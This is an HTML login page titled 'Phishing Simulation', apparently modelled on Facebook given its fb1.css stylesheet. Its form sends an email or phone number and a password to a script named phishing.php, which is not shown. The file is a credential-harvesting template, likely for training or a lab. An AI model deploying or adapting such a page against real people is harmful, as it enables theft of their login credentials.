<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Phishing Simulation</title>
    <link rel="stylesheet" href="fb1.css">
</head>
<body>
    <div class="container">
        <div class="login-box">
            <h2>Login</h2>
            <form action="phishing.php" method="POST">
                <div class="textbox">
                    <input type="text" placeholder="Email or Phone" name="email" required>
                </div>
                <div class="textbox">
                    <input type="password" placeholder="Password" name="password" required>
                </div>
                <button type="submit" class="btn">Log In</button>
            </form>
        </div>
    </div>
</body>
</html>
